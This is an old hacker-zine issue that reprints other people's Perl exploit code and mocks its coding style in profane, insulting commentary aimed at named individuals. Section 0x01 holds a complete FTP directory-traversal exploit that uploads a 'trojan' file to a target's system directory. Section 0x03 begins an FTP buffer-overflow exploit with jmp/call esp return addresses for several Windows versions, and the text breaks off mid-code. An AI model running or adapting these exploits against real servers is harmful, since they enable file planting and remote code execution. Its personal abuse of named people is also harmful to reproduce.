$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$ $$$$ $$$$$$$$$$ $$$$ $$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$ $$$$ $$$$ $$$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$$$ $$$$ $$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$ $$$$ $$$$$ $$$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$ $$$$$ $$$$$$$$$$$$ $$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ [root@yourbox.anywhere]$ date Tue Jan 31 01:34:43 EST 2006 [root@yourbox.anywhere]$ cat ./fucksticks.pl use strict; $ARGV[0] = q |~ TOC ~|; $ARGV[1] = q |~ kokanin sucks ~|; $ARGV[2] = q |~ frustration ~|; $ARGV[3] = q |~ Critical Security critically sucks ~|; $ARGV[4] = q |~ School You: MJD ~|; $ARGV[5] = q |~ kaneda doesn't get away ~|; $ARGV[6] = q |~ ph33rs ~|; $ARGV[7] = q |~ Fyodor gets caught ~|; $ARGV[8] = q |~ School You: BrowserUK ~|; $ARGV[9] = q |~ He wants mercy ~|; $ARGV[10] = q |~ School You: japhy ~|; $ARGV[11] = q |~ DSR *clap clap* ~|; $ARGV[12] = q |~ School You: tachyon ~|; $ARGV[13] = q |~ Reads like Roadkill ~|; $ARGV[14] = q |~ School You: merlyn ~|; $ARGV[15] = q |~ r0t0r can't get a break ~|; $ARGV[16] = q |~ Ch4r's contribution to Perl ~|; $ARGV[17] = q |~ School You: Juerd ~|; $ARGV[18] = q |~ byterage dropped the ball ~|; $ARGV[19] = q |~ School You: tilly ~|; $ARGV[20] = q |~ ilya loses his reputation ~|; $ARGV[21] = q |~ Shoutz and Outz ~|; [root@yourbox.anywhere]$ perl bring_it.pl -[0x01] # kokanin sucks -------------------------------------------------- # kokanin man I expected more from you # gobbles gobbles =P if(!$ARGV[0]){ die "Usage: ./thisscript.pl <ip> [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";} # heh use Net::FTP; my $target = $ARGV[0]; # you won't be the last to be horribly ignorant of shift my $dotdot = "../../../../../../../../../../../../../../"; # we got this thing called x, eh? my $dotdot = '../' x 14; if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";} if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";} if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";} if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";} if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";} if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";} # Dude, learn how to handle arguments. see the 'shift' function? takes a value off an array. smooth huh? #my $target = shift || '127.0.0.1'; #my $user = shift || 'IEUser'; #my $pass = shift || 'mail@mail.com'; #my $port = shift || '22003'; #my $path = shift || '/guests'; #my $trojan = shift || '/etc/hosts'; #my $dest = shift || 'owned.txt'; print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n"; use Net::FTP; # love how you include this twice. $ftp = Net::FTP->new("$target", #way to excess quote Debug => 0, Port => "$port") #oh look its those quotes again or die "Cannot connect: $@"; $ftp->login("$user","$pass") # quotes quotes! or die "Cannot login ", $ftp->message; $ftp->cwd("$writablepath") # quotes! or die "Cannot go to writable dir ", $ftp->message; my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE"); # ever heard of qw(), buddy? for(@systemroots){ $reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe"); if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; } # way to actually use that $systemroot var sometime } $ftp->binary; $ftp->put("$trojan","$dotdot"."$destination") # you really love quotes, don't you? and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message; $ftp->quit; # <ilja> idiot == kokanin ? # <idiot> kokanin = idiot # you said it # For a guy with a reputation, a knack for finding vulns, and years under your belt, you really suck. -[0x02] # frustration ---------------------------------------------------- It's all these morons who can't code Perl worth wiping their ass that think they can criticize it. They fail to have any intelligent understanding of the language. They try to code in Perl like they would code in C, and bitch when they hit differences or limitations. They don't learn the aspects of the language that aren't parallel with C. They keep their heads so far up their asses that they never learn the language, yet continue to write their cheap hacks in it while always supporting that C (or their language of choice) is better. Do they understand how stupid they sound when you make judgements on Perl with such a childish vantage point on it? Maybe they can read this and learn something. Or will they be arrogant enough to just dismiss it? -[0x03] # Critical Security Critically Sucks ----------------------------- use Net::FTP; use Switch; # Switch sucks if (@ARGV < 3) { print "--------------------------------------------------------------------\n"; print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n"; print " Offsets: \n"; print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n"; print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n"; print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n"; print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp esp\n"; print " If values not specified, default values will be used.\n"; print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\n"; print "--------------------------------------------------------------------\n"; } $host = "127.0.0.1"; $yourip = "127.0.0.1" ; # how about: my ($host, $yourip) = '127.0.0.1'; $offset = "\xE0\x3A\xB4\x76"; foreach (@ARGV) { $host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); $yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/); $offset = $1 if ($_=~/-o(.*)/); } # Do I need to get into how much you suck at regex? # Way to overuse parens and .* and $_ # my ($host) = $_ =~ /(-h\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/; # might as name that loop val since you'll use it switch ($offset) { case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp esp } foreach $letter (split '', $yourip) { $c++;}; # never heard of length() $ftp = Net::FTP->new($host, Debug => 0) or die "Cannot connect: $@"; $user = "A" x 213 . # You could give kok...
kazbiel